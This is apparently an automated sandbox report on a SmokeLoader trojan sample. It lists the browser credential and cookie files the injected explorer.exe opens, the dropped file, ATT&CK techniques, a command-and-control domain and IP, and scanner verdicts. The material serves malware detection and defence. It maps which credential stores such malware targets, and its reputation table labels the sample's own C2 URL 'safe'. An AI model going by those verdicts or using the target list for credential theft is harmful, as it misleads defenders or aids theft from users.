                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1435a377-bbaf-4c9c-8706-0811a779fa3f
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\.metadata-v2
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\808127e8-e7ed-4078-b3f3-7f09061a011f
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.81ddb4cc-1d49-45f2-961f-e24ea6db2be5.health.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\12f997af-c065-4562-b9f6-11000bb95c9b
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834580.6fc53411-ad83-4cf6-a5f6-905f0f3f52e8.health.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1d5599c8-3f43-42cc-8163-9a43c60a06d1
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\78267ebf-1fb3-4b11-82e9-903e54a2a54e
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829746.67aa4432-87f8-463e-b422-f6679add9971.first-shutdown.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\7278f154-e8f4-4235-84c5-c5c1c6af0084
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\45e26519-596d-41a5-b290-e547b44111fd
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a5d6ec76-765c-4778-afd2-1e05a1554d8e
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\7d12ac42-15c3-4db9-abfe-259bc8d249ac
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\15f01145-7764-450b-9ad5-323693350a9c
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857833.45e26519-596d-41a5-b290-e547b44111fd.health.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.a73949a2-5a70-4025-8008-88156c16bb4a.event.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a7174184-f177-48c4-876a-8a51c2ed8fbc
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829737.9f7a5e7a-2be0-4ff7-b132-b1f6e59a8e58.event.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834608.65054280-9d54-477d-a3ea-afcb1f88e001.health.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\events
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\05d02ac8-b2f1-4670-8541-db8ec2bbf427
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857869.95af30ae-acac-4802-b983-233d7fd3cf34.main.jsonlz4
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt
                    Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\3a40aaf9-3f8b-43a2-85e8-88e3ffc7666f
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json
                    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\277ffbb3-8e94-4f3f-acac-7a401d130160Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834606.011115ff-9301-40fc-805e-ba07b7fdfce4.event.jsonlz4Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                    Remote Access Functionality

                    Source: Yara match | File source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR
                    Source: Yara match | File source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe, type: SAMPLE
                    Source: Yara match | File source: 0.2.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.rrrrcve.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\rrrrcve, type: DROPPED
                    MITRE ATT&CK Matrix (one line per tactic; techniques are listed in the matrix's row order, and the number the report shows in front of a technique is kept)

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: 11 Native API; 1 Exploitation for Client Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Privilege Escalation: 1 DLL Side-Loading; 513 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 11 Masquerading; 12 Virtualization/Sandbox Evasion; 513 Process Injection; 1 Hidden Files and Directories
                    Credential Access: 1 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: 1 System Time Discovery; 3 File and Directory Discovery; 16 System Information Discovery; 531 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Application Window Discovery; System Owner/User Discovery; Network Sniffing
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 11 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Command and Control: 2 Ingress Tool Transfer; 2 Encrypted Channel; 3 Non-Application Layer Protocol; 113 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                    Behavior Graph (ID: 1448294; Sample: 171687721070698e62c2170d003...; Startdate: 28/05/2024; Architecture: WINDOWS; Score: 100)

                    Start
                      DNS/IP: prolinice.ga
                      Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
                      started: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                        Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; 2 other signatures
                        injected: explorer.exe
                          DNS/IP: prolinice.ga, 77.232.129.190, ports 49736, 49737, 49746, BSTV-ASRU, Russian Federation
                          Dropped: C:\Users\user\AppData\Roaming\rrrrcve (PE32); C:\Users\user\...\rrrrcve:Zone.Identifier (ASCII)
                          Signatures: Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); Deletes itself after installation; 2 other signatures
                          started: explorer.exe
                            Signatures: System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 3 other signatures
                          started: explorer.exe
                            Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                          started: explorer.exe
                          started: 6 other processes
                            started: WerFault.exe
                      started: rrrrcve
                        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

                    Source | Detection | Scanner | Label
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | 55% | ReversingLabs | Win32.Trojan.SmokeLoader
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | 58% | Virustotal |
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | 100% | Joe Sandbox ML |
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\rrrrcve | 100% | Avira | TR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Roaming\rrrrcve | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Roaming\rrrrcve | 55% | ReversingLabs | Win32.Trojan.SmokeLoader
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    https://aka.ms/odirmr | 0% | URL Reputation | safe
                    http://schemas.mi | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl | 0% | URL Reputation | safe
                    https://powerpoint.office.comcember | 0% | URL Reputation | safe
                    https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re- | 0% | URL Reputation | safe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
                    https://excel.office.com | 0% | URL Reputation | safe
                    http://schemas.micro | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | 0% | URL Reputation | safe
                    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | 0% | URL Reputation | safe
                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | 0% | URL Reputation | safe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi | 0% | URL Reputation | safe
                    https://api.msn.com/q | 0% | URL Reputation | safe
                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc | 0% | URL Reputation | safe
                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1 | 0% | URL Reputation | safe
                    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A | 0% | URL Reputation | safe
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | URL Reputation | safe
                    https://wns.windows.com/L | 0% | URL Reputation | safe
                    https://word.office.com | 0% | URL Reputation | safe
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | 0% | URL Reputation | safe
                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
                    http://schemas.micr | 0% | URL Reputation | safe
                    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | 0% | URL Reputation | safe
                    https://aka.ms/Vh5j3k | 0% | URL Reputation | safe
                    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | 0% | URL Reputation | safe
                    https://api.msn.com/v1/news/Feed/Windows?& | 0% | URL Reputation | safe
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | 0% | URL Reputation | safe
                    https://www.rd.com/list/polite-habits-campers-dislike/ | 0% | URL Reputation | safe
                    https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
                    https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar | 0% | URL Reputation | safe
                    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe
                    https://api.msn.com/ | 0% | URL Reputation | safe
                    https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d | 0% | URL Reputation | safe
                    https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
                    http://prolinice.ga/ndex.php | 0% | Avira URL Cloud | safe
                    https://outlook.com_ | 0% | URL Reputation | safe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe
                    https://www.msn.com:443/en-us/feed | 0% | URL Reputation | safe
